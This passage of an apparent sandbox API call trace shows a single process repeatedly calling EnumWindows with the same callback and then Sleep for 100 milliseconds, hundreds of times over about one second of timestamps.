(lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.472] Sleep (dwMilliseconds=0x64) [0131.473] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.474] Sleep (dwMilliseconds=0x64) [0131.476] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.477] Sleep (dwMilliseconds=0x64) [0131.478] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.478] Sleep (dwMilliseconds=0x64) [0131.479] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.480] Sleep (dwMilliseconds=0x64) [0131.481] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.481] Sleep (dwMilliseconds=0x64) [0131.482] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.483] Sleep (dwMilliseconds=0x64) [0131.484] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.484] Sleep (dwMilliseconds=0x64) [0131.485] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.486] Sleep (dwMilliseconds=0x64) [0131.488] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.489] Sleep (dwMilliseconds=0x64) [0131.490] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.490] Sleep (dwMilliseconds=0x64) [0131.502] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.502] Sleep (dwMilliseconds=0x64) [0131.504] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.504] Sleep (dwMilliseconds=0x64) [0131.506] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.506] Sleep (dwMilliseconds=0x64) [0131.548] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.549] Sleep (dwMilliseconds=0x64) [0131.556] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.557] Sleep (dwMilliseconds=0x64) [0131.558] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.558] Sleep (dwMilliseconds=0x64) [0131.560] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.560] Sleep (dwMilliseconds=0x64) [0131.561] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.561] Sleep (dwMilliseconds=0x64) [0131.563] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.563] Sleep (dwMilliseconds=0x64) [0131.566] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.566] Sleep (dwMilliseconds=0x64) [0131.567] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.567] Sleep (dwMilliseconds=0x64) [0131.569] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.569] Sleep (dwMilliseconds=0x64) [0131.570] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.570] Sleep (dwMilliseconds=0x64) [0131.572] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.572] Sleep (dwMilliseconds=0x64) [0131.573] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.573] Sleep (dwMilliseconds=0x64) [0131.575] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.575] Sleep (dwMilliseconds=0x64) [0131.583] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.583] Sleep (dwMilliseconds=0x64) [0131.631] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.631] Sleep (dwMilliseconds=0x64) [0131.633] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.634] Sleep (dwMilliseconds=0x64) [0131.638] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.638] Sleep (dwMilliseconds=0x64) [0131.640] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.640] Sleep (dwMilliseconds=0x64) [0131.642] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.642] Sleep (dwMilliseconds=0x64) [0131.645] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.645] Sleep (dwMilliseconds=0x64) [0131.647] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.647] Sleep (dwMilliseconds=0x64) [0131.649] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.649] Sleep (dwMilliseconds=0x64) [0131.650] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.650] Sleep (dwMilliseconds=0x64) [0131.652] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.652] Sleep (dwMilliseconds=0x64) [0131.653] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.653] Sleep (dwMilliseconds=0x64) [0131.655] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.655] Sleep (dwMilliseconds=0x64) [0131.656] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.656] Sleep (dwMilliseconds=0x64) [0131.658] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.658] Sleep (dwMilliseconds=0x64) [0131.659] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.659] Sleep (dwMilliseconds=0x64) [0131.661] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.661] Sleep (dwMilliseconds=0x64) [0131.662] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.662] Sleep (dwMilliseconds=0x64) [0131.664] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.664] Sleep (dwMilliseconds=0x64) [0131.666] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.666] Sleep (dwMilliseconds=0x64) [0131.695] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.696] Sleep (dwMilliseconds=0x64) [0131.697] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.697] Sleep (dwMilliseconds=0x64) [0131.699] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.699] Sleep (dwMilliseconds=0x64) [0131.700] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.700] Sleep (dwMilliseconds=0x64) [0131.702] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.702] Sleep (dwMilliseconds=0x64) [0131.704] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.704] Sleep (dwMilliseconds=0x64) [0131.705] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.705] Sleep (dwMilliseconds=0x64) [0131.707] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.707] Sleep (dwMilliseconds=0x64) [0131.708] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.708] Sleep (dwMilliseconds=0x64) [0131.710] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.710] Sleep (dwMilliseconds=0x64) [0131.711] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.711] Sleep (dwMilliseconds=0x64) [0131.713] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.713] Sleep (dwMilliseconds=0x64) [0131.715] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.715] Sleep (dwMilliseconds=0x64) [0131.716] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.716] Sleep (dwMilliseconds=0x64) [0131.718] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.718] Sleep (dwMilliseconds=0x64) [0131.725] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.726] Sleep (dwMilliseconds=0x64) [0131.727] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.727] Sleep (dwMilliseconds=0x64) [0131.729] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.729] Sleep (dwMilliseconds=0x64) [0131.731] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.731] Sleep (dwMilliseconds=0x64) [0131.793] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.793] Sleep (dwMilliseconds=0x64) [0131.794] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.795] Sleep (dwMilliseconds=0x64) [0131.797] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.798] Sleep (dwMilliseconds=0x64) [0131.800] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.800] Sleep (dwMilliseconds=0x64) [0131.802] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.813] Sleep (dwMilliseconds=0x64) [0131.814] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.814] Sleep (dwMilliseconds=0x64) [0131.816] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.816] Sleep (dwMilliseconds=0x64) [0131.818] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.818] Sleep (dwMilliseconds=0x64) [0131.819] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.820] Sleep (dwMilliseconds=0x64) [0131.821] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.821] Sleep (dwMilliseconds=0x64) [0131.823] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.824] Sleep (dwMilliseconds=0x64) [0131.825] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.825] Sleep (dwMilliseconds=0x64) [0131.827] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.828] Sleep (dwMilliseconds=0x64) [0131.829] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.829] Sleep (dwMilliseconds=0x64) [0131.831] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.831] Sleep (dwMilliseconds=0x64) [0131.832] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.832] Sleep (dwMilliseconds=0x64) [0131.834] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.835] Sleep (dwMilliseconds=0x64) [0131.836] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.837] Sleep (dwMilliseconds=0x64) [0131.838] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.838] Sleep (dwMilliseconds=0x64) [0131.855] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.855] Sleep (dwMilliseconds=0x64) [0131.856] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.856] Sleep (dwMilliseconds=0x64) [0131.858] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.858] Sleep (dwMilliseconds=0x64) [0131.860] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.860] Sleep (dwMilliseconds=0x64) [0131.861] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.861] Sleep (dwMilliseconds=0x64) [0131.863] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.863] Sleep (dwMilliseconds=0x64) [0131.864] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.864] Sleep (dwMilliseconds=0x64) [0131.866] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.866] Sleep (dwMilliseconds=0x64) [0131.867] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.867] Sleep (dwMilliseconds=0x64) [0131.870] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.870] Sleep (dwMilliseconds=0x64) [0131.871] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.871] Sleep (dwMilliseconds=0x64) [0131.873] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.873] Sleep (dwMilliseconds=0x64) [0131.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.875] Sleep (dwMilliseconds=0x64) [0131.876] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.876] Sleep (dwMilliseconds=0x64) [0131.878] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.878] Sleep (dwMilliseconds=0x64) [0131.880] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.880] Sleep (dwMilliseconds=0x64) [0131.881] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.882] Sleep (dwMilliseconds=0x64) [0131.884] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.884] Sleep (dwMilliseconds=0x64) [0131.886] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.886] Sleep (dwMilliseconds=0x64) [0131.887] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.887] Sleep (dwMilliseconds=0x64) [0131.889] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.889] Sleep (dwMilliseconds=0x64) [0131.890] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.890] Sleep (dwMilliseconds=0x64) [0131.892] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.892] Sleep (dwMilliseconds=0x64) [0131.893] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.895] Sleep (dwMilliseconds=0x64) [0131.896] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.896] Sleep (dwMilliseconds=0x64) [0131.898] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.898] Sleep (dwMilliseconds=0x64) [0131.900] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.900] Sleep (dwMilliseconds=0x64) [0131.902] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.902] Sleep (dwMilliseconds=0x64) [0131.905] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.907] Sleep (dwMilliseconds=0x64) [0131.908] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.908] Sleep (dwMilliseconds=0x64) [0131.910] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.910] Sleep (dwMilliseconds=0x64) [0131.911] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.911] Sleep (dwMilliseconds=0x64) [0131.913] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.913] Sleep (dwMilliseconds=0x64) [0131.914] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.914] Sleep (dwMilliseconds=0x64) [0131.916] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.916] Sleep (dwMilliseconds=0x64) [0131.917] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.917] Sleep (dwMilliseconds=0x64) [0131.920] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.920] Sleep (dwMilliseconds=0x64) [0131.922] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.922] Sleep (dwMilliseconds=0x64) [0131.923] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.923] Sleep (dwMilliseconds=0x64) [0131.925] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.925] Sleep (dwMilliseconds=0x64) [0131.926] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.926] Sleep (dwMilliseconds=0x64) [0131.928] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.928] Sleep (dwMilliseconds=0x64) [0131.929] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.929] Sleep (dwMilliseconds=0x64) [0131.931] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.931] Sleep (dwMilliseconds=0x64) [0131.932] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.934] Sleep (dwMilliseconds=0x64) [0131.936] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.936] Sleep (dwMilliseconds=0x64) [0131.937] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.937] Sleep (dwMilliseconds=0x64) [0131.940] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.941] Sleep (dwMilliseconds=0x64) [0131.942] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.942] Sleep (dwMilliseconds=0x64) [0131.944] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.944] Sleep (dwMilliseconds=0x64) [0131.990] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0131.990] Sleep (dwMilliseconds=0x64) [0132.116] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.116] Sleep (dwMilliseconds=0x64) [0132.118] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.118] Sleep (dwMilliseconds=0x64) [0132.119] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.119] Sleep (dwMilliseconds=0x64) [0132.122] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.122] Sleep (dwMilliseconds=0x64) [0132.124] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.125] Sleep (dwMilliseconds=0x64) [0132.126] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.126] Sleep (dwMilliseconds=0x64) [0132.131] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.132] Sleep (dwMilliseconds=0x64) [0132.133] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.133] Sleep (dwMilliseconds=0x64) [0132.135] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.135] Sleep (dwMilliseconds=0x64) [0132.136] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.136] Sleep (dwMilliseconds=0x64) [0132.138] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.138] Sleep (dwMilliseconds=0x64) [0132.139] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.139] Sleep (dwMilliseconds=0x64) [0132.142] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.142] Sleep (dwMilliseconds=0x64) [0132.160] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.160] Sleep (dwMilliseconds=0x64) [0132.162] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.162] Sleep (dwMilliseconds=0x64) [0132.163] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.163] Sleep (dwMilliseconds=0x64) [0132.165] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.165] Sleep (dwMilliseconds=0x64) [0132.167] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.167] Sleep (dwMilliseconds=0x64) [0132.168] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.168] Sleep (dwMilliseconds=0x64) [0132.170] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.170] Sleep (dwMilliseconds=0x64) [0132.172] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.172] Sleep (dwMilliseconds=0x64) [0132.173] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.173] Sleep (dwMilliseconds=0x64) [0132.175] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.175] Sleep (dwMilliseconds=0x64) [0132.176] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.176] Sleep (dwMilliseconds=0x64) [0132.178] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.178] Sleep (dwMilliseconds=0x64) [0132.195] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.196] Sleep (dwMilliseconds=0x64) [0132.199] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.200] Sleep (dwMilliseconds=0x64) [0132.201] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.202] Sleep (dwMilliseconds=0x64) [0132.203] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.204] Sleep (dwMilliseconds=0x64) [0132.205] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.205] Sleep (dwMilliseconds=0x64) [0132.208] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.208] Sleep (dwMilliseconds=0x64) [0132.210] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.210] Sleep (dwMilliseconds=0x64) [0132.211] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.212] Sleep (dwMilliseconds=0x64) [0132.213] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.214] Sleep (dwMilliseconds=0x64) [0132.215] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.215] Sleep (dwMilliseconds=0x64) [0132.217] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.217] Sleep (dwMilliseconds=0x64) [0132.218] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.218] Sleep (dwMilliseconds=0x64) [0132.220] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.220] Sleep (dwMilliseconds=0x64) [0132.222] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.222] Sleep (dwMilliseconds=0x64) [0132.224] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.224] Sleep (dwMilliseconds=0x64) [0132.225] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.225] Sleep (dwMilliseconds=0x64) [0132.226] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.227] Sleep (dwMilliseconds=0x64) [0132.228] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.228] Sleep (dwMilliseconds=0x64) [0132.230] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.230] Sleep (dwMilliseconds=0x64) [0132.232] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.232] Sleep (dwMilliseconds=0x64) [0132.237] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.237] Sleep (dwMilliseconds=0x64) [0132.239] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.239] Sleep (dwMilliseconds=0x64) [0132.240] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.241] Sleep (dwMilliseconds=0x64) [0132.242] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.242] Sleep (dwMilliseconds=0x64) [0132.244] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.244] Sleep (dwMilliseconds=0x64) [0132.246] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.246] Sleep (dwMilliseconds=0x64) [0132.248] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.248] Sleep (dwMilliseconds=0x64) [0132.334] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.334] Sleep (dwMilliseconds=0x64) [0132.337] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.338] Sleep (dwMilliseconds=0x64) [0132.339] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.339] Sleep (dwMilliseconds=0x64) [0132.340] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.341] Sleep (dwMilliseconds=0x64) [0132.342] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.342] Sleep (dwMilliseconds=0x64) [0132.343] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.344] Sleep (dwMilliseconds=0x64) [0132.345] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.346] Sleep (dwMilliseconds=0x64) [0132.347] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.347] Sleep (dwMilliseconds=0x64) [0132.348] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.349] Sleep (dwMilliseconds=0x64) [0132.350] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.350] Sleep (dwMilliseconds=0x64) [0132.351] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.352] Sleep (dwMilliseconds=0x64) [0132.353] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.353] Sleep (dwMilliseconds=0x64) [0132.354] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.355] Sleep (dwMilliseconds=0x64) [0132.360] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.360] Sleep (dwMilliseconds=0x64) [0132.361] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.362] Sleep (dwMilliseconds=0x64) [0132.363] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.363] Sleep (dwMilliseconds=0x64) [0132.364] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.365] Sleep (dwMilliseconds=0x64) [0132.366] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.366] Sleep (dwMilliseconds=0x64) [0132.367] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.368] Sleep (dwMilliseconds=0x64) [0132.369] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.369] Sleep (dwMilliseconds=0x64) [0132.370] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.371] Sleep (dwMilliseconds=0x64) [0132.372] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.372] Sleep (dwMilliseconds=0x64) [0132.373] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.374] Sleep (dwMilliseconds=0x64) [0132.375] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.375] Sleep (dwMilliseconds=0x64) [0132.376] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.377] Sleep (dwMilliseconds=0x64) [0132.379] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.379] Sleep (dwMilliseconds=0x64) [0132.381] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.381] Sleep (dwMilliseconds=0x64) [0132.383] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.383] Sleep (dwMilliseconds=0x64) [0132.384] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.384] Sleep (dwMilliseconds=0x64) [0132.385] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.386] Sleep (dwMilliseconds=0x64) [0132.387] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.387] Sleep (dwMilliseconds=0x64) [0132.390] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.393] Sleep (dwMilliseconds=0x64) [0132.395] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.395] Sleep (dwMilliseconds=0x64) [0132.396] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.396] Sleep (dwMilliseconds=0x64) [0132.398] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.398] Sleep (dwMilliseconds=0x64) [0132.399] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.399] Sleep (dwMilliseconds=0x64) [0132.401] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.401] Sleep (dwMilliseconds=0x64) [0132.402] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.402] Sleep (dwMilliseconds=0x64) [0132.404] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.404] Sleep (dwMilliseconds=0x64) [0132.406] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.406] Sleep (dwMilliseconds=0x64) [0132.407] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.407] Sleep (dwMilliseconds=0x64) [0132.413] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.413] Sleep (dwMilliseconds=0x64) [0132.414] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.414] Sleep (dwMilliseconds=0x64) [0132.416] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.416] Sleep (dwMilliseconds=0x64) [0132.417] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.417] Sleep (dwMilliseconds=0x64) [0132.419] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.419] Sleep (dwMilliseconds=0x64) [0132.420] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.420] Sleep (dwMilliseconds=0x64) [0132.422] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.422] Sleep (dwMilliseconds=0x64) [0132.427] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.427] Sleep (dwMilliseconds=0x64) [0132.429] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.429] Sleep (dwMilliseconds=0x64) [0132.430] EnumWindows 